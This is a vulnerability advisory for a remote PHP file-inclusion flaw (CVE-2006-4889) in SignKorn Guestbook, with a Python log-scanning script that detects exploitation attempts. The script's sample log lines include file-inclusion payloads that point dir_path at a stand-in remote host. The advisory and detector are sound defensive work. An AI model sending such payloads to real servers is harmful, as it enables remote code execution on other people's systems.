PT-2006-5643 · Telekorn · Telekorn Signkorn Guestbook

The__Leo · Published 2006-09-19 · Updated 2024-02-14 · CVE-2006-4889

CVSS v2.0: 5.1 (Medium)

Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions: Telekorn SignKorn Guestbook (SL) versions 1.3 and earlier

Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the dir_path parameter in multiple PHP files, including "index.php", "includes/functions.gb.php", "includes/functions.admin.php", "includes/admin.inc.php", "help.php", "smile.php", "entry.php", "adminhelp0.php", "adminhelp1.php", "adminhelp2.php", "adminhelp3.php" in the "help/en" and "help/de" directories, and "preview.php", "log.php", "index.php", "config.php", and "admin.php" in the "admin" directory, when register_globals is enabled.

Recommendations: For Telekorn SignKorn Guestbook (SL) versions 1.3 and earlier, consider disabling the register_globals setting to prevent exploitation. As a temporary workaround, restrict access to the vulnerable PHP files until a patch is available. Avoid using the dir_path parameter in the affected PHP files until the issue is resolved.
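
A detection check for the behaviour described above, added here as an example and not taken from the advisory or the vendor's code: it scans web access-log lines for requests to the listed scripts whose dir_path query parameter carries a URL. The combined log format is an assumption, and the log lines, addresses and host names are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script names from the advisory, matched by file name because the
# guestbook's install prefix differs per site.
AFFECTED = {
    "index.php", "functions.gb.php", "functions.admin.php", "admin.inc.php",
    "help.php", "smile.php", "entry.php", "adminhelp0.php", "adminhelp1.php",
    "adminhelp2.php", "adminhelp3.php", "preview.php", "log.php",
    "config.php", "admin.php",
}
# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http:, ftp:, ...), not a local path.
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]+:", re.I)

def flag_line(line):
    """Return (script, dir_path value) if the line is a suspect request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    try:
        parts = urlsplit(m.group(1))
    except ValueError:  # malformed request target
        return None
    script = next((s for s in parts.path.lower().split("/") if s in AFFECTED), None)
    if script is None:
        return None
    # parse_qsl percent-decodes, so dir_path=http%3A%2F%2F... is caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "dir_path" and SCHEME_RE.match(value):
            return script, value
    return None

def scan(lines):  # -> [(line_number, (script, value)), ...] for flagged lines
    hits = ((n, flag_line(l)) for n, l in enumerate(lines, 1))
    return [(n, h) for n, h in hits if h]

# Constructed sample log lines (documentation addresses, .invalid host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Sep/2006:10:00:01 +0000] "GET /guestbook/index.php?page=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [19/Sep/2006:10:00:07 +0000] "GET /guestbook/help/en/adminhelp1.php?dir_path=http%3A%2F%2Ffiles.example.invalid%2Fa.txt%3F HTTP/1.1" 200 312',
    '192.0.2.10 - - [19/Sep/2006:10:00:09 +0000] "GET /guestbook/smile.php?dir_path=../ HTTP/1.1" 200 900',
    '192.0.2.44 - - [19/Sep/2006:10:00:12 +0000] "GET /guestbook/admin/log.php?dir_path=ftp://files.example.invalid/a HTTP/1.0" 200 0',
]
if __name__ == "__main__":
    for n, (script, value) in scan(SAMPLE_LOG):
        print(f"line {n}: {script} dir_path={value!r}")
```

Access logs record only the query string; with register_globals enabled the same variable can also arrive in a POST body or a cookie, which this check does not see.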

Related Identifiers

CVE-2006-4889

Affected Products

Telekorn Signkorn Guestbook